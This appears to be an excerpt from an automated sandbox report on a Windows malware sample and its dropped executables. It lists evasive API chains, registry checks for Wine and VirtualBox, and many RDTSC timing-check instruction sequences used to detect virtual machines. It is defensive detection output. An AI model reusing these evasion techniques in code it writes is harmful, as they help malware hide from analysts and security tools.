Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Documents\JDGIECGIEB.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85FBFC second address: 85FC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85FC00 second address: 85FC11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DE9ED second address: 9DE9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DE9F2 second address: 9DE9F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DDE03 second address: 9DDE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DDE07 second address: 9DDE0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DDF94 second address: 9DDFAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F4465131BD0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFC8A second address: 9DFD09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ebx 0x0000000b jmp 00007F44646ECA56h 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 add ecx, dword ptr [ebp+122D2B48h] 0x00000018 lea ebx, dword ptr [ebp+12453A8Ah] 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F44646ECA48h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 sub ecx, dword ptr [ebp+122D1F45h] 0x0000003e jmp 00007F44646ECA57h 0x00000043 push eax 0x00000044 push ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F44646ECA4Ch 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFDEE second address: 9DFDF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFDF2 second address: 9DFE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F44646ECA4Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e push edi 0x0000000f jmp 00007F44646ECA55h 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a je 00007F44646ECA5Eh 0x00000020 jmp 00007F44646ECA58h 0x00000025 mov eax, dword ptr [eax] 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a ja 00007F44646ECA46h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFEF2 second address: 9DFEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFEFD second address: 9DFF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jns 00007F44646ECA50h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jne 00007F44646ECA50h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F44646ECA58h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFF47 second address: 9DFF4C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFFA1 second address: 9DFFF6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F44646ECA4Ch 0x00000008 ja 00007F44646ECA46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edi, dword ptr [ebp+122D2A8Ch] 0x00000019 push 00000000h 0x0000001b xor edx, dword ptr [ebp+122D2A50h] 0x00000021 stc 0x00000022 call 00007F44646ECA49h 0x00000027 pushad 0x00000028 push edx 0x00000029 jmp 00007F44646ECA4Fh 0x0000002e pop edx 0x0000002f jmp 00007F44646ECA51h 0x00000034 popad 0x00000035 push eax 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 push ebx 0x0000003a pop ebx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFFF6 second address: 9E00AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F4465131BD5h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F4465131BD3h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 jmp 00007F4465131BD3h 0x00000026 pop eax 0x00000027 mov edx, dword ptr [ebp+122D1D56h] 0x0000002d push 00000003h 0x0000002f movzx ecx, bx 0x00000032 or dword ptr [ebp+122D581Fh], ecx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007F4465131BC8h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 mov dword ptr [ebp+122D2503h], edi 0x0000005a push 00000003h 0x0000005c sbb di, E687h 0x00000061 call 00007F4465131BC9h 0x00000066 jmp 00007F4465131BCEh 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F4465131BCBh 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E00AE second address: 9E00D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F44646ECA51h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jo 00007F44646ECA4Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E00D4 second address: 9E00F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 ja 00007F4465131BC6h 0x0000000b jmp 00007F4465131BCEh 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E00F9 second address: 9E012E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F44646ECA5Fh 0x00000008 jmp 00007F44646ECA59h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jng 00007F44646ECA54h 0x00000019 push eax 0x0000001a push edx 0x0000001b jno 00007F44646ECA46h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E012E second address: 9E0177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 lea ebx, dword ptr [ebp+12453A9Eh] 0x0000000d jnc 00007F4465131BDDh 0x00000013 call 00007F4465131BD0h 0x00000018 or dword ptr [ebp+122D205Bh], esi 0x0000001e pop edx 0x0000001f xchg eax, ebx 0x00000020 jmp 00007F4465131BD0h 0x00000025 push eax 0x00000026 pushad 0x00000027 push esi 0x00000028 pushad 0x00000029 popad 0x0000002a pop esi 0x0000002b push eax 0x0000002c push edx 0x0000002d jnp 00007F4465131BC6h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0147A second address: A0147E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FF5DD second address: 9FF5EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007F4465131BC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FFA47 second address: 9FFA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FFA4B second address: 9FFA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FFEC7 second address: 9FFEED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F44646ECA4Bh 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0007D second address: A00083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C5F0E second address: 9C5F14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C5F14 second address: 9C5F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0048F second address: A0049F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F44646ECA46h 0x00000008 js 00007F44646ECA46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0049F second address: A004A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00C6D second address: A00C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA50h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00E1A second address: A00E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00E20 second address: A00E24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00E24 second address: A00E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00E2C second address: A00E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F44646ECA46h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00E38 second address: A00E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00FEA second address: A00FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00FEE second address: A0101C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD5h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4465131BCFh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0101C second address: A01020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A01020 second address: A01024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A01024 second address: A0102A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0102A second address: A01030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0480B second address: A04811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A04811 second address: A04815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06E6E second address: A06E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0702F second address: A07033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A07155 second address: A0715A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0715A second address: A07174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F4465131BC6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f ja 00007F4465131BD0h 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0D393 second address: A0D397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0D397 second address: A0D39D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0D39D second address: A0D3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C9A3 second address: A0C9A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CC2E second address: A0CC37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CC37 second address: A0CC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CEF7 second address: A0CF05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CF05 second address: A0CF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CF09 second address: A0CF23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CF23 second address: A0CF49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD3h 0x00000007 pushad 0x00000008 jmp 00007F4465131BCEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0D24E second address: A0D269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F44646ECA54h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F0E6 second address: A0F112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4465131BC6h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F4465131BCAh 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F4465131BD2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10E3F second address: A10E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10ECC second address: A10ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10ED0 second address: A10ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A11079 second address: A11082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1125A second address: A1125E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A113B6 second address: A113C0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4465131BCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1149D second address: A114A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A11B83 second address: A11B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A11B88 second address: A11BAE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F44646ECA67h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F44646ECA55h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A11BAE second address: A11BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1211C second address: A12120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A140C0 second address: A140C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A14BCA second address: A14BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1493B second address: A1494A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BCAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A14BD0 second address: A14BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F44646ECA52h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1494A second address: A1495E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4465131BD0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A14BFE second address: A14C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A14C03 second address: A14C08 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A14C08 second address: A14C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F44646ECA48h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D2ADCh] 0x00000028 mov dword ptr [ebp+122D57F1h], ebx 0x0000002e push 00000000h 0x00000030 mov edi, 4EC2FB78h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F44646ECA48h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 jmp 00007F44646ECA4Fh 0x00000056 mov esi, eax 0x00000058 xchg eax, ebx 0x00000059 push esi 0x0000005a jns 00007F44646ECA48h 0x00000060 pop esi 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jmp 00007F44646ECA4Eh 0x0000006a pushad 0x0000006b popad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A16193 second address: A16197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
